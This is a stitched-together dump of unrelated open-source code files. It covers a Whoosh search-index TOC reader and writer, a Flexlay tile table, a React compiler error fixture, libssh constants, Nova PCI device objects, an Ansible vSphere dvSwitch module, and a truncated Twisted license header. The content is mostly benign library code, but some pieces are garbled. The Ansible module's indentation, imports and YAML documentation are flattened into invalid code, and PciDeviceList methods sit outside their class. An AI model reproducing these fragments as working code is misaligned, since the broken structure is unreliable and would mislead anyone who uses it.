        """Creates a new, empty index in the storage and returns a
        FileIndex for it."""
        TOC.create(storage, schema, indexname)
        return cls(storage, schema, indexname)
    def __repr__(self):
        return "%s(%r, %r)" % (self.__class__.__name__,
                               self.storage, self.indexname)
    def close(self):
        # Nothing to release: every operation opens and closes its own
        # streams.
        pass
    # add_field and remove_field are inherited from Index
    def latest_generation(self):
        # Scan the storage for the highest-numbered TOC file.
        return TOC._latest_generation(self.storage, self.indexname)
    # refresh and up_to_date are inherited from Index
    def last_modified(self):
        # The TOC file of the latest generation carries the commit time.
        gen = self.latest_generation()
        filename = TOC._filename(self.indexname, gen)
        return self.storage.file_modified(filename)
    def is_empty(self):
        return len(self._read_toc().segments) == 0
    def optimize(self, **kwargs):
        w = self.writer(**kwargs)
        w.commit(optimize=True)
    # searcher is inherited from Index
    def writer(self, procs=1, **kwargs):
        # procs > 1 selects the multiprocessing writer; both imports are
        # deferred to avoid circular imports at module load time.
        if procs > 1:
            from whoosh.multiproc import MpWriter
            return MpWriter(self, procs=procs, **kwargs)
        else:
            from whoosh.writing import SegmentWriter
            return SegmentWriter(self, **kwargs)
    def lock(self, name):
        """Returns a lock object that you can try to call acquire() on to
        lock the index.
        """
        return self.storage.lock(self.indexname + "_" + name)
    def _read_toc(self):
        # Re-reads the TOC from storage on every call; there is no caching.
        return TOC.read(self.storage, self.indexname, schema=self._schema)
    def _segments(self):
        return self._read_toc().segments
    def _current_schema(self):
        return self._read_toc().schema
    @property
    def schema(self):
        return self._current_schema()
    @property
    def release(self):
        return self._read_toc().release
    @property
    def version(self):
        return self._read_toc().version
    @classmethod
    def _reader(cls, storage, schema, segments, generation, reuse=None):
        # Returns a reader for the given segments, possibly reusing already
        # opened readers
        from whoosh.reading import SegmentReader, MultiReader, EmptyReader
        reusable = {}
        try:
            if len(segments) == 0:
                # This index has no segments! Return an EmptyReader object,
                # which simply returns empty or zero to every method
                return EmptyReader(schema)
            if reuse:
                # Put all atomic readers in a dictionary keyed by their
                # generation, so we can re-use them if possible.
                # NOTE(review): readers are keyed here by r.generation() but
                # looked up by segment_id() in segreader below -- this relies
                # on a leaf reader's generation being its segment id; confirm
                # against whoosh.reading.SegmentReader.
                readers = [r for r, _ in reuse.leaf_readers()]
                reusable = dict((r.generation(), r) for r in readers)
            # Make a function to open readers, which reuses reusable readers.
            # It removes any readers it reuses from the "reusable" dictionary,
            # so later we can close any readers left in the dictionary.
            def segreader(segment):
                segid = segment.segment_id()
                if segid in reusable:
                    r = reusable[segid]
                    del reusable[segid]
                    return r
                else:
                    return SegmentReader(storage, schema, segment,
                                         generation=generation)
            if len(segments) == 1:
                # This index has one segment, so return a SegmentReader object
                # for the segment
                return segreader(segments[0])
            else:
                # This index has multiple segments, so create a list of
                # SegmentReaders for the segments, then composite them with a
                # MultiReader
                readers = [segreader(segment) for segment in segments]
                return MultiReader(readers, generation=generation)
        finally:
            # Close any readers the caller offered for reuse that were not
            # picked up above -- the caller may not use them afterward.
            for r in reusable.values():
                r.close()
    def reader(self, reuse=None):
        retries = 10
        while retries > 0:
            # Read the information from the TOC file
            try:
                info = self._read_toc()
                return self._reader(self.storage, info.schema, info.segments,
                                    info.generation, reuse=reuse)
            except IOError:
                # Presume that we got a "file not found error" because a writer
                # deleted one of the files just as we were trying to open it,
                # and so retry a few times before actually raising the
                # exception
                e = sys.exc_info()[1]
                retries -= 1
                if retries <= 0:
                    raise e
                sleep(0.05)
# TOC class
class TOC(object):
    """Object representing the state of the index after a commit. Essentially
    a container for the index's schema and the list of segment objects.

    The TOC is persisted as a small binary file named ``_<index>_<gen>.toc``
    (see read/write for the exact field layout).
    """
    def __init__(self, schema, segments, generation,
                 version=_CURRENT_TOC_VERSION, release=__version__):
        self.schema = schema
        self.segments = segments
        self.generation = generation
        self.version = version
        self.release = release
    @classmethod
    def _filename(cls, indexname, gen):
        # TOC file name for a given index name and generation number.
        return "_%s_%s.toc" % (indexname, gen)
    @classmethod
    def _pattern(cls, indexname):
        # Matches TOC file names and captures the generation number.
        # NOTE(review): the "." before "toc" is an unescaped regex dot, so it
        # matches any character there; harmless in practice but should be
        # r"\.toc$" to be strict.
        return re.compile("^_%s_([0-9]+).toc$" % indexname)
    @classmethod
    def _segment_pattern(cls, indexname):
        # Matches segment file names and captures the segment id part.
        return re.compile("(%s_[0-9a-z]+)[.][A-Za-z0-9_.]+" % indexname)
    @classmethod
    def _latest_generation(cls, storage, indexname):
        # Scan all file names in the storage for the highest TOC generation;
        # returns -1 when no TOC file exists.
        pattern = cls._pattern(indexname)
        mx = -1
        for filename in storage:
            m = pattern.match(filename)
            if m:
                mx = max(int(m.group(1)), mx)
        return mx
    @classmethod
    def create(cls, storage, schema, indexname=_DEF_INDEX_NAME):
        """Wipes any existing files for the named index and writes a fresh
        generation-0 TOC with no segments."""
        schema = ensure_schema(schema)
        # Clear existing files
        prefix = "_%s_" % indexname
        for filename in storage:
            if filename.startswith(prefix):
                storage.delete_file(filename)
        # Write a TOC file with an empty list of segments
        toc = cls(schema, [], 0)
        toc.write(storage, indexname)
    @classmethod
    def read(cls, storage, indexname, gen=None, schema=None):
        """Reads the TOC for the given index (latest generation unless
        ``gen`` is given) and returns a TOC instance. Raises
        EmptyIndexError when no TOC exists, IndexError on an architecture
        or byte-order mismatch, and IndexVersionError for unknown on-disk
        format versions."""
        if gen is None:
            gen = cls._latest_generation(storage, indexname)
            if gen < 0:
                raise EmptyIndexError("Index %r does not exist in %r"
                                      % (indexname, storage))
        # Read the content of this index from the .toc file.
        tocfilename = cls._filename(indexname, gen)
        stream = storage.open_file(tocfilename)
        # The file starts with the sizes of C int/long/float so that an
        # index written on a different architecture is rejected early.
        def check_size(name, target):
            sz = stream.read_varint()
            if sz != target:
                raise IndexError("Index was created on different architecture:"
                                 " saved %s = %s, this computer = %s"
                                 % (name, sz, target))
        check_size("int", _INT_SIZE)
        check_size("long", _LONG_SIZE)
        check_size("float", _FLOAT_SIZE)
        # Known constant used to detect byte-order problems.
        if not stream.read_int() == -12345:
            raise IndexError("Number misread: byte order problem")
        version = stream.read_int()
        release = (stream.read_varint(), stream.read_varint(),
                   stream.read_varint())
        if version != _CURRENT_TOC_VERSION:
            # Older formats may have a compatibility loader registered in
            # whoosh.legacy; otherwise the index is unreadable.
            if version in toc_loaders:
                loader = toc_loaders[version]
                schema, segments = loader(stream, gen, schema, version)
            else:
                raise IndexVersionError("Can't read format %s" % version,
                                        version)
        else:
            # If the user supplied a schema object with the constructor, don't
            # load the pickled schema from the saved index.
            if schema:
                stream.skip_string()
            else:
                schema = pickle.loads(stream.read_string())
            schema = ensure_schema(schema)
            # Generation
            index_gen = stream.read_int()
            assert gen == index_gen
            _ = stream.read_int()  # Unused
            segments = stream.read_pickle()
        stream.close()
        return cls(schema, segments, gen, version=version, release=release)
    def write(self, storage, indexname):
        """Serializes this TOC to storage, writing to a temporary file and
        renaming it into place so the TOC appears atomically."""
        schema = ensure_schema(self.schema)
        schema.clean()
        # Use a temporary file for atomic write.
        tocfilename = self._filename(indexname, self.generation)
        tempfilename = '%s.%s' % (tocfilename, time())
        stream = storage.create_file(tempfilename)
        # Header: architecture sizes, byte-order check constant, format
        # version, and the Whoosh release that wrote the file.
        stream.write_varint(_INT_SIZE)
        stream.write_varint(_LONG_SIZE)
        stream.write_varint(_FLOAT_SIZE)
        stream.write_int(-12345)
        stream.write_int(_CURRENT_TOC_VERSION)
        for num in __version__[:3]:
            stream.write_varint(num)
        try:
            stream.write_string(pickle.dumps(schema, -1))
        except pickle.PicklingError:
            # Try to narrow down the error to a single field
            for fieldname, field in schema.items():
                try:
                    pickle.dumps(field)
                except pickle.PicklingError:
                    e = sys.exc_info()[1]
                    raise pickle.PicklingError("%s %s=%r" % (e, fieldname, field))
            # Otherwise, re-raise the original exception
            raise
        stream.write_int(self.generation)
        stream.write_int(0)  # Unused
        stream.write_pickle(self.segments)
        stream.close()
        # Rename temporary file to the proper filename
        storage.rename_file(tempfilename, tocfilename, safe=True)
# Flexlay - A Generic 2D Game Editor
# Copyright (C) 2014 Ingo Ruhnke <grumbel@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Tile ids in the "itile" tile set that are treated as solid.
solid_itiles = [10, 11, 12, 13, 14, 15, 20, 21, 22, 23, 30, 31, 113, 114]
# Autotiling lookup table: each row is nine 0/1 flags followed by a tile id.
# NOTE(review): the nine flags presumably describe the 3x3 neighbourhood
# around a cell (row-major, top-left to bottom-right), and the final value
# is the tile id to use when the neighbourhood matches -- confirm against
# the code that consumes this table.
itile_conditions = [
    [0, 0, 0, 0, 0, 1, 0, 1, 1, 7],
    [0, 0, 1, 0, 0, 1, 0, 1, 1, 7],
    [0, 0, 0, 0, 0, 0, 0, 1, 1, 7],
    [0, 0, 0, 0, 0, 0, 1, 1, 1, 8],
    [0, 0, 0, 0, 0, 0, 1, 1, 0, 9],
    [0, 1, 1, 0, 0, 0, 0, 0, 0, 16],
    [1, 1, 1, 0, 0, 0, 0, 0, 0, 17],
    [1, 1, 1, 1, 0, 0, 0, 0, 0, 17],
    [1, 1, 1, 0, 0, 1, 0, 0, 0, 17],
    [1, 1, 1, 1, 0, 0, 1, 0, 0, 17],
    [1, 1, 1, 0, 0, 1, 0, 0, 1, 17],
    [1, 1, 0, 0, 0, 0, 0, 0, 0, 18],
    [0, 1, 1, 0, 1, 1, 0, 0, 0, 10],
    [1, 1, 1, 0, 1, 1, 0, 0, 0, 11],
    [1, 1, 0, 1, 1, 0, 0, 0, 0, 12],
    [0, 1, 1, 0, 1, 1, 0, 1, 1, 10],
    [1, 1, 1, 1, 1, 1, 1, 1, 1, 11],
    [1, 1, 0, 1, 1, 0, 1, 1, 0, 12],
    [0, 0, 0, 0, 1, 1, 0, 1, 1, 13],
    [0, 0, 0, 1, 1, 1, 1, 1, 1, 14],
    [0, 0, 0, 1, 1, 0, 1, 1, 0, 15],
    [1, 0, 0, 1, 1, 1, 1, 1, 1, 20],
    [1, 1, 0, 1, 1, 0, 1, 1, 1, 21],
    [0, 1, 1, 0, 1, 1, 1, 1, 1, 22],
    [0, 0, 1, 1, 1, 1, 1, 1, 1, 23],
    [1, 1, 1, 1, 1, 0, 1, 1, 0, 30],
    [1, 1, 1, 0, 1, 1, 0, 1, 1, 31],
    [0, 0, 0, 1, 1, 0, 1, 1, 1, 113],
    [0, 0, 0, 0, 1, 1, 1, 1, 1, 114],
]
# EOF # | unknown | codeparrot/codeparrot-clean | ||
## Input
```javascript
function Component() {
let callback = () => {
callback = null;
};
return <div onClick={callback} />;
}
```
## Error
```
Found 1 error:
Error: Cannot reassign variable after render completes
Reassigning `callback` after render has completed can cause inconsistent behavior on subsequent renders. Consider using state instead.
error.function-expression-references-variable-its-assigned-to.ts:3:4
1 | function Component() {
2 | let callback = () => {
> 3 | callback = null;
| ^^^^^^^^ Cannot reassign `callback` after render completes
4 | };
5 | return <div onClick={callback} />;
6 | }
``` | unknown | github | https://github.com/facebook/react | compiler/packages/babel-plugin-react-compiler/src/__tests__/fixtures/compiler/error.function-expression-references-variable-its-assigned-to.expect.md |
# Constant definitions mirroring libssh C API enums and flags.
# ssh_server_known_e: results of checking the server's host key against the
# known-hosts file.
SSH_SERVER_ERROR = -1
SSH_SERVER_NOT_KNOWN = 0
SSH_SERVER_KNOWN_OK = 1
SSH_SERVER_KNOWN_CHANGED = 2
SSH_SERVER_FOUND_OTHER = 3
SSH_SERVER_FILE_NOT_FOUND = 4
# ssh_options_e: option identifiers accepted by libssh's option setter.
SSH_OPTIONS_HOST = 0x0
SSH_OPTIONS_PORT = 0x1
SSH_OPTIONS_PORT_STR = 0x2
SSH_OPTIONS_FD = 0x3
SSH_OPTIONS_USER = 0x4
SSH_OPTIONS_SSH_DIR = 0x5
SSH_OPTIONS_IDENTITY = 0x6
SSH_OPTIONS_ADD_IDENTITY = 0x7
SSH_OPTIONS_KNOWNHOSTS = 0x8
SSH_OPTIONS_TIMEOUT = 0x9
SSH_OPTIONS_TIMEOUT_USEC = 0xa
SSH_OPTIONS_SSH1 = 0xb
SSH_OPTIONS_SSH2 = 0xc
SSH_OPTIONS_LOG_VERBOSITY = 0xd
SSH_OPTIONS_LOG_VERBOSITY_STR = 0xe
SSH_OPTIONS_CIPHERS_C_S = 0xf
SSH_OPTIONS_CIPHERS_S_C = 0x10
SSH_OPTIONS_COMPRESSION_C_S = 0x11
SSH_OPTIONS_COMPRESSION_S_C = 0x12
SSH_OPTIONS_PROXYCOMMAND = 0x13
SSH_OPTIONS_BINDADDR = 0x14
SSH_OPTIONS_STRICTHOSTKEYCHECK = 0x15
SSH_OPTIONS_COMPRESSION = 0x16
SSH_OPTIONS_COMPRESSION_LEVEL = 0x17
# Value-type tags for the SSH_OPTIONS table below; presumably used by the
# binding layer to decide how to convert each option's value before passing
# it to libssh -- confirm against the consumer of this table.
_OT_STRING = 'string'
_OT_UINT = 'uint'
_OT_INT = 'int'
_OT_LONG = 'long'
_OT_BOOL = 'bool'
# Maps friendly option names to (libssh option constant, value-type tag).
SSH_OPTIONS = { 'user': (SSH_OPTIONS_USER, _OT_STRING),
                'host': (SSH_OPTIONS_HOST, _OT_STRING),
                'verbosity': (SSH_OPTIONS_LOG_VERBOSITY, _OT_UINT),
                'port': (SSH_OPTIONS_PORT, _OT_UINT),
                'fd': (SSH_OPTIONS_FD, _OT_INT),
                'ssh_dir': (SSH_OPTIONS_SSH_DIR, _OT_STRING),
                'identity': (SSH_OPTIONS_IDENTITY, _OT_STRING),
                'add_identity': (SSH_OPTIONS_ADD_IDENTITY, None),
                'knownhosts': (SSH_OPTIONS_KNOWNHOSTS, _OT_STRING),
                'timeout': (SSH_OPTIONS_TIMEOUT, _OT_LONG),
                'timeout_usec': (SSH_OPTIONS_TIMEOUT_USEC, _OT_LONG),
                'ssh1': (SSH_OPTIONS_SSH1, _OT_BOOL),
                'ssh2': (SSH_OPTIONS_SSH2, _OT_BOOL),
                'cipherscs': (SSH_OPTIONS_CIPHERS_C_S, _OT_STRING),
                'cipherssc': (SSH_OPTIONS_CIPHERS_S_C, _OT_STRING),
                'compresscs': (SSH_OPTIONS_COMPRESSION_C_S, _OT_STRING),
                'compresssc': (SSH_OPTIONS_COMPRESSION_S_C, _OT_STRING),
                'proxycmd': (SSH_OPTIONS_PROXYCOMMAND, _OT_STRING),
                'bindaddr': (SSH_OPTIONS_BINDADDR, _OT_STRING),
                'stricthostkeys': (SSH_OPTIONS_STRICTHOSTKEYCHECK, _OT_BOOL),
                'compression': (SSH_OPTIONS_COMPRESSION, _OT_STRING),
                'compression_n': (SSH_OPTIONS_COMPRESSION_LEVEL, _OT_INT) }
# ssh_auth_e: authentication results.
SSH_AUTH_ERROR = -1
SSH_AUTH_SUCCESS = 0
SSH_AUTH_DENIED = 1
SSH_AUTH_PARTIAL = 2
SSH_AUTH_INFO = 3
SSH_AUTH_AGAIN = 4
# Return codes.
SSH_OK = 0
SSH_ERROR = -1
SSH_AGAIN = -2
SSH_EOF = -127
# ssh_error_types_e: error severities reported by libssh.
SSH_NO_ERROR = 0
SSH_REQUEST_DENIED = 1
SSH_FATAL = 2
SSH_EINTR = 3
# Status flags.
SSH_CLOSED = 0x01
SSH_READ_PENDING = 0x02
SSH_WRITE_PENDING = 0x04
SSH_CLOSED_ERROR = 0x08
# Copyright 2013 Intel Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils
from nova import db
from nova import objects
from nova.objects import base
from nova.objects import fields
from nova import utils
LOG = logging.getLogger(__name__)
def compare_pci_device_attributes(obj_a, obj_b):
    """Field-by-field equality check for two PCI device objects.

    Fields declared on base.NovaPersistentObject are ignored; for every
    other field the two objects must agree both on whether the field is set
    and, when it is set, on its value.
    """
    ignored = base.NovaPersistentObject.fields.keys()
    for field in obj_a.obj_fields:
        if field in ignored:
            continue
        a_is_set = obj_a.obj_attr_is_set(field)
        if a_is_set != obj_b.obj_attr_is_set(field):
            return False
        if a_is_set and getattr(obj_a, field) != getattr(obj_b, field):
            return False
    return True
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class PciDevice(base.NovaPersistentObject, base.NovaObject,
                base.NovaObjectDictCompat):
    """Object to represent a PCI device on a compute node.
    PCI devices are managed by the compute resource tracker, which discovers
    the devices from the hardware platform, claims, allocates and frees
    devices for instances.
    The PCI device information is permanently maintained in a database.
    This makes it convenient to get PCI device information, like physical
    function for a VF device, adjacent switch IP address for a NIC,
    hypervisor identification for a PCI device, etc. It also provides a
    convenient way to check device allocation information for administrator
    purposes.
    A device can be in available/claimed/allocated/deleted/removed state.
    A device is available when it is discovered..
    A device is claimed prior to being allocated to an instance. Normally the
    transition from claimed to allocated is quick. However, during a resize
    operation the transition can take longer, because devices are claimed in
    prep_resize and allocated in finish_resize.
    A device becomes removed when hot removed from a node (i.e. not found in
    the next auto-discover) but not yet synced with the DB. A removed device
    should not be allocated to any instance, and once deleted from the DB,
    the device object is changed to deleted state and no longer synced with
    the DB.
    Filed notes::
        | 'dev_id':
        |   Hypervisor's identification for the device, the string format
        |   is hypervisor specific
        | 'extra_info':
        |   Device-specific properties like PF address, switch ip address etc.
    """

    # Version 1.0: Initial version
    # Version 1.1: String attributes updated to support unicode
    # Version 1.2: added request_id field
    # Version 1.3: Added field to represent PCI device NUMA node
    VERSION = '1.3'

    fields = {
        'id': fields.IntegerField(),
        # Note(yjiang5): the compute_node_id may be None because the pci
        # device objects are created before the compute node is created in DB
        'compute_node_id': fields.IntegerField(nullable=True),
        'address': fields.StringField(),
        'vendor_id': fields.StringField(),
        'product_id': fields.StringField(),
        'dev_type': fields.StringField(),
        'status': fields.StringField(),
        'dev_id': fields.StringField(nullable=True),
        'label': fields.StringField(nullable=True),
        'instance_uuid': fields.StringField(nullable=True),
        'request_id': fields.StringField(nullable=True),
        'extra_info': fields.DictOfStringsField(),
        'numa_node': fields.IntegerField(nullable=True),
    }

    def obj_make_compatible(self, primitive, target_version):
        # Downgrade the primitive for older consumers: drop fields that did
        # not exist before the requested version.
        target_version = utils.convert_version_to_tuple(target_version)
        if target_version < (1, 2) and 'request_id' in primitive:
            del primitive['request_id']

    def update_device(self, dev_dict):
        """Sync the content from device dictionary to device object.
        The resource tracker updates the available devices periodically.
        To avoid meaningless syncs with the database, we update the device
        object only if a value changed.
        """
        # Note(yjiang5): status/instance_uuid should only be updated by
        # functions like claim/allocate etc. The id is allocated by
        # database. The extra_info is created by the object.
        #
        # NOTE: this previously used map() over dev_dict.pop, which is lazy
        # on Python 3 and therefore never executed the pops; use an explicit
        # loop so the protected keys are really removed before syncing.
        for key in ('status', 'instance_uuid', 'id', 'extra_info'):
            dev_dict.pop(key, None)
        for k, v in dev_dict.items():
            if k in self.fields:
                self[k] = v
            else:
                # Note (yjiang5) extra_info.update does not update
                # obj_what_changed, set it explicitly
                extra_info = self.extra_info
                extra_info.update({k: v})
                self.extra_info = extra_info

    def __init__(self, *args, **kwargs):
        super(PciDevice, self).__init__(*args, **kwargs)
        self.obj_reset_changes()
        self.extra_info = {}

    # NOTE(review): defining __eq__ without __hash__ makes instances
    # unhashable on Python 3; left unchanged to preserve behavior.
    def __eq__(self, other):
        return compare_pci_device_attributes(self, other)

    def __ne__(self, other):
        return not (self == other)

    @staticmethod
    def _from_db_object(context, pci_device, db_dev):
        # Copy DB columns onto the object; extra_info is stored as a JSON
        # blob in the database and must be deserialized.
        for key in pci_device.fields:
            if key != 'extra_info':
                pci_device[key] = db_dev[key]
            else:
                extra_info = db_dev.get("extra_info")
                pci_device.extra_info = jsonutils.loads(extra_info)
        pci_device._context = context
        pci_device.obj_reset_changes()
        return pci_device

    @base.remotable_classmethod
    def get_by_dev_addr(cls, context, compute_node_id, dev_addr):
        # Fetch the device with the given PCI address on a compute node.
        db_dev = db.pci_device_get_by_addr(
            context, compute_node_id, dev_addr)
        return cls._from_db_object(context, cls(), db_dev)

    @base.remotable_classmethod
    def get_by_dev_id(cls, context, id):
        # Fetch the device with the given database id.
        db_dev = db.pci_device_get_by_id(context, id)
        return cls._from_db_object(context, cls(), db_dev)

    @classmethod
    def create(cls, dev_dict):
        """Create a PCI device based on hypervisor information.
        As the device object is just created and is not synced with db yet
        thus we should not reset changes here for fields from dict.
        """
        pci_device = cls()
        pci_device.update_device(dev_dict)
        pci_device.status = 'available'
        return pci_device

    @base.remotable
    def save(self):
        # Persist the object's state: destroy the DB row for removed
        # devices, update changed fields otherwise; deleted devices are no
        # longer synced with the DB at all.
        if self.status == 'removed':
            self.status = 'deleted'
            db.pci_device_destroy(self._context, self.compute_node_id,
                                  self.address)
        elif self.status != 'deleted':
            updates = self.obj_get_changes()
            if 'extra_info' in updates:
                updates['extra_info'] = jsonutils.dumps(updates['extra_info'])
            if updates:
                db_pci = db.pci_device_update(self._context,
                                              self.compute_node_id,
                                              self.address, updates)
                self._from_db_object(self._context, self, db_pci)
@base.NovaObjectRegistry.register
class PciDeviceList(base.ObjectListBase, base.NovaObject):
    # Version 1.0: Initial version
    #              PciDevice <= 1.1
    # Version 1.1: PciDevice 1.2
    VERSION = '1.1'

    fields = {
        'objects': fields.ListOfObjectsField('PciDevice'),
    }
    # Maps each version of this list object to the PciDevice child version
    # it is allowed to carry, for backlevel compatibility.
    child_versions = {
        '1.0': '1.1',
        # NOTE(danms): PciDevice was at 1.1 before we added this
        '1.1': '1.2',
        '1.2': '1.3',
    }
def __init__(self, *args, **kwargs):
    """Initialize an empty list with a clean change-set."""
    super(PciDeviceList, self).__init__(*args, **kwargs)
    self.objects = []
    self.obj_reset_changes()
@base.remotable_classmethod
def get_by_compute_node(cls, context, node_id):
    """Return all PCI devices belonging to the given compute node."""
    db_dev_list = db.pci_device_get_all_by_node(context, node_id)
    return base.obj_make_list(context, cls(context), objects.PciDevice,
                              db_dev_list)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, uuid):
    """Return all PCI devices allocated to the given instance."""
    rows = db.pci_device_get_all_by_instance_uuid(context, uuid)
    return base.obj_make_list(context, cls(context), objects.PciDevice,
                              rows)
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_dvswitch
short_description: Create or remove a distributed vSwitch
description:
- Create or remove a distributed vSwitch
version_added: 2.0
author:
- Joseph Callen (@jcpowermac)
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
datacenter_name:
description:
- The name of the datacenter that will contain the dvSwitch
required: True
switch_name:
description:
- The name of the switch to create or remove
required: True
switch_version:
description:
- The version of the switch to create. Can be 6.5.0, 6.0.0, 5.5.0, 5.1.0, 5.0.0 with a vcenter running vSphere 6.5
- Needed if you have a vcenter version > ESXi version to join DVS. If not specified version=version of vcenter
required: False
version_added: 2.5
mtu:
description:
- The switch maximum transmission unit
required: True
uplink_quantity:
description:
- Quantity of uplink per ESXi host added to the switch
required: True
discovery_proto:
description:
- Link discovery protocol between Cisco and Link Layer discovery
choices:
- 'cdp'
- 'lldp'
required: True
discovery_operation:
description:
- Select the discovery operation
choices:
- 'both'
- 'none'
- 'advertise'
- 'listen'
state:
description:
- Create or remove dvSwitch
default: 'present'
choices:
- 'present'
- 'absent'
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Create dvswitch
local_action:
module: vmware_dvswitch
hostname: vcenter_ip_or_hostname
username: vcenter_username
password: vcenter_password
datacenter_name: datacenter
switch_name: dvSwitch
switch_version: 6.0.0
mtu: 9000
uplink_quantity: 2
discovery_proto: lldp
discovery_operation: both
state: present
'''
try:
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (HAS_PYVMOMI,
connect_to_api,
find_datacenter_by_name,
find_dvs_by_name,
vmware_argument_spec,
wait_for_task
)
class VMwareDVSwitch(object):
    """Create or remove a vSphere distributed virtual switch (dvSwitch)."""

    def __init__(self, module):
        """Read module parameters and connect to the vCenter API."""
        self.module = module
        self.dvs = None
        self.switch_name = self.module.params['switch_name']
        self.switch_version = self.module.params['switch_version']
        self.datacenter_name = self.module.params['datacenter_name']
        self.mtu = self.module.params['mtu']
        self.uplink_quantity = self.module.params['uplink_quantity']
        self.discovery_proto = self.module.params['discovery_proto']
        self.discovery_operation = self.module.params['discovery_operation']
        self.state = self.module.params['state']
        self.content = connect_to_api(module)

    def process_state(self):
        """Dispatch to the handler matching desired vs. current state.

        Fails the module cleanly on vmodl faults or any other exception.
        """
        try:
            # Outer key: desired state; inner key: current state on vCenter.
            dvs_states = {
                'absent': {
                    'present': self.state_destroy_dvs,
                    'absent': self.state_exit_unchanged,
                },
                'present': {
                    'update': self.state_update_dvs,
                    'present': self.state_exit_unchanged,
                    'absent': self.state_create_dvs,
                }
            }
            dvs_states[self.state][self.check_dvs_configuration()]()
        except vmodl.RuntimeFault as runtime_fault:
            self.module.fail_json(msg=runtime_fault.msg)
        except vmodl.MethodFault as method_fault:
            self.module.fail_json(msg=method_fault.msg)
        except Exception as e:
            self.module.fail_json(msg=str(e))

    def create_dvswitch(self, network_folder):
        """Build a CreateSpec from the module params and run CreateDVS_Task.

        :param network_folder: the datacenter's networkFolder to create in.
        :return: (changed, result) from waiting on the vCenter task.
        """
        result = None
        changed = False

        spec = vim.DistributedVirtualSwitch.CreateSpec()
        spec.configSpec = vim.dvs.VmwareDistributedVirtualSwitch.ConfigSpec()
        spec.configSpec.uplinkPortPolicy = vim.DistributedVirtualSwitch.NameArrayUplinkPortPolicy()
        spec.configSpec.linkDiscoveryProtocolConfig = vim.host.LinkDiscoveryProtocolConfig()

        spec.configSpec.name = self.switch_name
        spec.configSpec.maxMtu = self.mtu
        spec.configSpec.linkDiscoveryProtocolConfig.protocol = self.discovery_proto
        spec.configSpec.linkDiscoveryProtocolConfig.operation = self.discovery_operation
        spec.productInfo = vim.dvs.ProductSpec()
        spec.productInfo.name = "DVS"
        spec.productInfo.vendor = "VMware"
        spec.productInfo.version = self.switch_version

        # One named uplink port per requested uplink: uplink1..uplinkN.
        for count in range(1, self.uplink_quantity + 1):
            spec.configSpec.uplinkPortPolicy.uplinkPortName.append("uplink%d" % count)

        task = network_folder.CreateDVS_Task(spec)
        changed, result = wait_for_task(task)
        return changed, result

    def state_exit_unchanged(self):
        """Desired state already satisfied; report no change."""
        self.module.exit_json(changed=False)

    def state_destroy_dvs(self):
        """Destroy the existing dvSwitch found by check_dvs_configuration."""
        task = self.dvs.Destroy_Task()
        changed, result = wait_for_task(task)
        self.module.exit_json(changed=changed, result=str(result))

    def state_update_dvs(self):
        """Updating an existing dvSwitch is not supported yet."""
        self.module.exit_json(changed=False, msg="Currently not implemented.")

    def state_create_dvs(self):
        """Create the dvSwitch (honoring check mode)."""
        changed = True
        result = None

        if not self.module.check_mode:
            dc = find_datacenter_by_name(self.content, self.datacenter_name)
            # Fail with a clear message instead of an AttributeError on
            # dc.networkFolder when the datacenter does not exist.
            if dc is None:
                self.module.fail_json(
                    msg="Datacenter '%s' not found" % self.datacenter_name)
            changed, result = self.create_dvswitch(dc.networkFolder)

        self.module.exit_json(changed=changed, result=str(result))

    def check_dvs_configuration(self):
        """Look up the dvSwitch by name; return 'present' or 'absent'."""
        self.dvs = find_dvs_by_name(self.content, self.switch_name)
        if self.dvs is None:
            return 'absent'
        else:
            return 'present'
def main():
    """Module entry point: build the arg spec and run the state machine."""
    spec = vmware_argument_spec()
    spec.update(
        datacenter_name=dict(required=True, type='str'),
        switch_name=dict(required=True, type='str'),
        mtu=dict(required=True, type='int'),
        switch_version=dict(type='str'),
        uplink_quantity=dict(required=True, type='int'),
        discovery_proto=dict(required=True, choices=['cdp', 'lldp'], type='str'),
        discovery_operation=dict(required=True, choices=['both', 'none', 'advertise', 'listen'], type='str'),
        state=dict(default='present', choices=['present', 'absent'], type='str'),
    )

    module = AnsibleModule(argument_spec=spec, supports_check_mode=True)

    if not HAS_PYVMOMI:
        module.fail_json(msg='pyvmomi is required for this module')

    VMwareDVSwitch(module).process_state()
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
# Twisted, the Framework of Your Internet
# Copyright (C) 2001-2002 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
